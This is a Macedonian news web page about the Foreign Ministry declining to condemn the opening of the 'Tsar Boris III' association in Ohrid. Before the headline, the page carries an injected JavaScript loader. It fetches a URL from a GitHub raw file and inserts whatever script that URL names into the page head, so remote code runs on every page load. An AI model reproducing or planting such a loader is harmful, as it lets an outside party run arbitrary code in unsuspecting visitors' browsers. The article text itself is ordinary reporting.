;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Нема осуда - МНР во пресрет на отворањето на фашистичкото здружение „Цар Борис III" во Охрид повика на достоинствено и зрело однесување - Антропол
АктуелноЛокално

Нема осуда – МНР во пресрет на отворањето на фашистичкото здружение „Цар Борис III” во Охрид повика на достоинствено и зрело однесување

По повод отварањето на фашистичкото здружение „Цар Борис III” во Охрид не испрати никаква осуда, туку напротив, на повиците за протест од Левица против отварањето на здружението, тие повикаа и испратија апел на зрело и достоинствено однесување, втемелено врз почитта кон правото на сите граѓани, без разлика на својата етничка припадност.

– Македонија, како демократска земја во која слободите и правата на човекот и граѓанинот се издигнати на ниво на темелна вредност на Уставот и државноста, ќе продолжи да го заштитува правото на сите граѓани и заедници да го изразуваат, негуваат и развиваат својот етнички, културен, јазичен и верски идентитет, како и слободата на уверувањето, совеста, мислата и јавното изразување на мислата. Во контекст на горенаведеното, ги замолуваме сите чинители да се воздржат од обиди за злоупотреба на своите права и слободи, особено да избегнуваат употреба на провокации и негирање на правата и слободите на другите, соопштија од МНР.